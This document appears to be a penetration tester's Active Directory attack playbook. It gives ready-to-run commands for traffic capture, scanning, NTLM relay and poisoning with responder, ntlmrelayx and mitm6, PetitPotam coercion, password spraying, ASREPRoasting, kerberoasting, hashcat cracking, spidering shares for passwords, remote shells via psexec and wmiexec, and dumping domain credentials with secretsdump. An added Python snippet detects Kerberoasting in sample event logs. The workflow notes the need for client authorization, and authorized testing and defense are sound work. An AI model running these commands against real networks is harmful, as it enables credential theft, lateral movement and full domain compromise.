Pen Test Workflow

  1. Recon the environment
    1. Dump Traffic
    2. Identify the Domain and the Domain Controllers
    3. Nmap
  2. Checking Protocols/Ports/Services
    1. DNS (Port 53)
      1. Zone Transfer
    2. SNMP (Ports 161,162,10161,10162)
  3. Get a username and password
    1. Relay/Poisoning
      1. Listen passively with responder
      2. Responder with SMB relay
      3. mitm6
      4. PetitPotam
    2. kerbrute
    3. enum4linux (User List)
    4. ASREPRoast
  4. Cracking Hashes
    1. LM/NTLM/Kerberos 5 TGS
  5. Find a path to Domain Admin
    1. Bloodhound-Python
    2. kerberoasting
  6. Enumerate Environment
    1. SMB (Ports 139,445)
      1. SMB Client
      2. Crackmap Exec (CME)
    2. Shell a Windows Machine
    3. manspider
    4. Nmap/ldapdomaindump/masscan/eyewitness
  7. Domain Admin Creds
    1. secretsdump

Recon the environment

Unless there is a big time crunch, take some time to familiarize yourself with the environment you are in. What is your IP address? Where are the DCs, file servers, mail servers, and SQL servers? What is their naming schema like? Build a map and use it to focus your efforts on the seemingly weakest points.

Dump Traffic

The first command will dump all traffic to a .pcap which can be analyzed locally. Run it in the morning, afternoon and evening. The second command will dump all UDP traffic.

tshark -c 25000 -w morning.pcap

tcpdump -i <INTERFACE> -w <OUTFILE> -C 50000000 -W 10 not ether host <LOCAL_MAC_ADDR> and not host <RNA_IP>

Examine and look for insecure protocols (telnet, http) and IPv6 traffic (for mitm6).

Identify the Domain and the Domain Controllers

Once you find them, make a domain_dcs.txt file.

cat /etc/resolv.conf

nslookup -type=srv _ldap._tcp.dc._msdcs.<DOMAIN>

nmcli dev show eth0

Nmap

Start with the subnet of your current host, then the subnet of a DC. If you have the IP of a workstation, it is a good idea to check there as well. I will also individually scan a good sample of hosts that were discovered with CME, ldapdomaindump, etc. When you discover specific open ports, run script scans for easy-to-pop vulnerabilities.

nmap -PN -sV --top-ports 50 --open <IP> -oA <IP>_quick_scan
nmap -PN -sC -sV <IP> -oA <IP>_regular_scan
nmap -PN -sC -sV -p- <IP> -oA <IP>_deep_scan
nmap -p 25,2525 --script smtp-open-relay <IP> -v
nmap -p 139,445 --script "smb-vuln*" <IP>
nmap -p 389 -n -sV --script "ldap* and not brute" <DC IP>
nmap -p 161 --script "snmp* and not snmp-brute" <target>

Checking Protocols/Ports/Services

DNS (Port 53)

Zone Transfer

dnsrecon -d <domain.com> -t axfr -j </path/to/output/zone_transfer.json>

SNMP (Ports 161,162,10161,10162)

snmpbulkwalk -c [COMM_STRING] -v [VERSION] [IP] .

snmpbulkwalk -c public -v2c 10.10.11.136 .

snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [DIR_IP]

snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [DIR_IP] 1.3.6.1.2.1.4.34.1.3

snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [DIR_IP] NET-SNMP-EXTEND-MIB::nsExtendObjects

snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [DIR_IP] .1

Get a username and password

Generate a list of possible usernames with OSINT etc.

Some of these commands utilize password spraying. First verify with the client that this is authorized, and provide a list of the accounts you are going to spray. Spray accounts ~8 hours apart to prevent any lockouts.

Relay/Poisoning

Listen passively with responder

responder -i eth0 -A

Responder with SMB relay

Find hosts with no SMB signing. In responder.conf set:

  • SMB = Off
  • HTTP = Off

crackmapexec smb <Subnet or ips.txt> --gen-relay-list relay.txt

responder -i eth0 -dwv

In a second terminal:

impacket-ntlmrelayx -tf relay.txt -smb2support

mitm6

Requires client authorization; can cause network interruptions.

mitm6 -i eth0 --ignore-nofqdn -wh <domainName>

impacket-ntlmrelayx -6 -t ldaps://<IP of DC> -wh <fwpad.domainName> --delegate-access -smb2support

PetitPotam

Source: PetitPotam.py in the topotam/PetitPotam repository on GitHub.

PetitPotam.py -d <domain> <listener_ip> <target_ip>

kerbrute

Brute-force usernames with a good list; password spray with seasonal passwords.

./kerbrute_linux_amd64 userenum -d <DOMAIN> usernames.txt

./kerbrute_linux_amd64 passwordspray -d <DOMAIN> domain_users.txt Winter2022

enum4linux (User List)

enum4linux -U <IP> | grep 'user:'

ASREPRoast

Requires a user list.

impacket-GetNPUsers <domain>/ -usersfile <usernames.txt> -format hashcat -outputfile <hashes.domain.txt>

Cracking Hashes

LM/NTLM/Kerberos 5 TGS

hashcat -m 3000 -a 3 hash.txt

hashcat -m 1000 -a 3 hash.txt

hashcat -m 13100 kerbHashes.txt <wordlist location>

Find a path to Domain Admin

Bloodhound-Python

Installing BloodHound: see the Linux section of the BloodHound 4.2.0 documentation.

Export this data and view it in BloodHound.

bloodhound-python -d <DOMAIN> -u <USER> -p <PASSWORD> -gc <DC.DOMAIN.LOCAL> -c all

Take the output files and drop them directly into BloodHound.

kerberoasting

impacket-GetUserSPNs -outputfile kerbHashes.txt -dc-ip <ip> 'domain/user:password'

impacket-GetUserSPNs -outputfile kerbHashes.txt -hashes 'LMhash:NThash' -dc-ip <ip> 'domain/user'

crackmapexec ldap <ip> -u <user> -p 'password' --kerberoasting kerbHashes.txt --kdcHost <ip>
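Both the ASREPRoast step (GetNPUsers) and the kerberoasting step above leave a distinctive trace in domain controller logs: 4768 TGT requests issued without pre-authentication, and bursts of 4769 service-ticket requests with RC4 (0x17) encryption for many different service accounts. This added example (not from the original page or from impacket) runs that detection logic over constructed event records.

```python
# Added example (not from the original page): flag Kerberoasting and AS-REP
# roasting patterns in constructed Windows Security events.
# 4769 = TGS request, 4768 = TGT request. Ticket encryption 0x17 (RC4-HMAC)
# is what offline cracking wants; current clients normally ask for AES (0x12).
from collections import defaultdict

RC4_HMAC = 0x17

# Constructed sample events (not real log data).
SAMPLE_EVENTS = [
    {"id": 4769, "user": "jdoe", "service": "svc_sql", "enc": 0x17},
    {"id": 4769, "user": "jdoe", "service": "svc_web", "enc": 0x17},
    {"id": 4769, "user": "jdoe", "service": "svc_backup", "enc": 0x17},
    {"id": 4769, "user": "jdoe", "service": "svc_print", "enc": 0x17},
    {"id": 4769, "user": "msmith", "service": "svc_sql", "enc": 0x12},  # normal AES
    {"id": 4769, "user": "msmith", "service": "krbtgt", "enc": 0x12},
    {"id": 4768, "user": "legacy_acct", "enc": 0x17, "preauth": 0},     # no pre-auth
    {"id": 4768, "user": "msmith", "enc": 0x12, "preauth": 2},          # PA-ENC-TIMESTAMP
]


def detect_kerberoast(events, min_services=3):
    """Requesters that pulled RC4 service tickets for >= min_services distinct
    service accounts. krbtgt is excluded: TGT renewals name it in 4769 too."""
    services = defaultdict(set)
    for e in events:
        if e["id"] == 4769 and e["enc"] == RC4_HMAC and e["service"] != "krbtgt":
            services[e["user"]].add(e["service"])
    return {u: sorted(s) for u, s in services.items() if len(s) >= min_services}


def detect_asrep_roast(events):
    """Accounts issued a TGT with pre-authentication type 0 (none). Their AS-REP
    can be requested by anyone who knows the username and cracked offline."""
    return sorted({e["user"] for e in events
                   if e["id"] == 4768 and e.get("preauth") == 0})
```

The kerberoast rule keys on the requesting account, so a single compromised user pulling tickets for many SPNs stands out even when each individual request looks routine.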

Enumerate Environment

Try to get a username/password before proceeding.

Take some time here to look at the information you have gathered. Look through any files you were able to obtain. Look at the ldapdomaindump description fields for passwords.

SMB (Ports 139,445)

SMB Client

smbclient -U '<USER>' \\\\<IP>\\<SHARE>

smbclient -U '%' -N \\\\<IP>\\<SHARE>

smbclient --no-pass -L //<IP>

impacket-smbclient [[domain/]username[:password]@]<targetName or address>

Crackmap Exec (CME)

CME can be used to enumerate hosts and users, check for SMB signing, list shares, and check password policies; without credentials, check for shares that allow guest access.

cme smb <IP Range>

cme smb 192.168.1.0/24 -u '<USER>' -p '<PASSWORD>' --users

cme smb 192.168.1.0/24 -u '<USER>' -p '<PASSWORD>' --shares

crackmapexec smb <IP> -u '<USER>' -p '<PASSWORD>' --pass-pol

Shell a Windows Machine

impacket-psexec <DOMAIN.LOCAL/USER:PASSWORD@IP_ADDRESS>

impacket-wmiexec <DOMAIN.LOCAL/USER:PASSWORD@IP_ADDRESS>

manspider

Spider shares and look for sensitive info.

sudo apt install tesseract-ocr

pip install pipx

pipx install git+https://github.com/blacklanternsecurity/MANSPIDER

manspider 192.168.0.0/24 -f passw user admin account network login logon cred -d <DOMAIN> -u <USER> -p <PASSWORD>

manspider <SERVER_NAME>.<DOMAIN>.local -c password -e xlsx -d <DOMAIN> -u <USER> -p <PASSWORD>

manspider share.<DOMAIN>.local -e bat com vbs ps1 psd1 psm1 pem key rsa pub reg txt cfg conf config -d <DOMAIN> -u <USER> -p <PASSWORD>

manspider share.<DOMAIN>.local --dirnames bank financ payable payment reconcil remit voucher vendor eft swift -f '[0-9]{5,}' -d <DOMAIN> -u <USER> -p <PASSWORD>

Nmap/ldapdomaindump/masscan/eyewitness

Use the ldapdomaindump data to build a list of hosts, resolve the hosts to IPs, run masscan on those IPs, run nmap on the masscan hits, then run EyeWitness on the nmap results.

ldapdomaindump -u domain\\USER -p 'PASSWORD' --grouped-json -o /home/USER/ldapdomaindump <DC-IP>

cd /home/USER/ldapdomaindump

# Column 3 of domain_computers.grep is dNSHostName; skip the header row before resolving.
cut -d $'\t' -f 3 domain_computers.grep | tail -n +2 | while read -r host; do dig +short "$host" >> ips.txt; done

masscan -p 80,443,8080,8000,8008,9000,8443,591 -iL ips.txt | tee -a web_ips.txt

# masscan prints "Discovered open port 80/tcp on <IP>"; the IP is the last field.
awk '/Discovered open port/ {print $NF}' web_ips.txt | sort -u > web_ips_for_nmap.txt

nmap -p 80,443,8080,8000,8008,9000,8443,591 -iL web_ips_for_nmap.txt -oA web_ips_for_eyewitness

eyewitness -x web_ips_for_eyewitness.xml

Domain Admin Creds

secretsdump

secretsdump.py '<DOMAIN>/<USER>:<PASS>@<DC_IP>'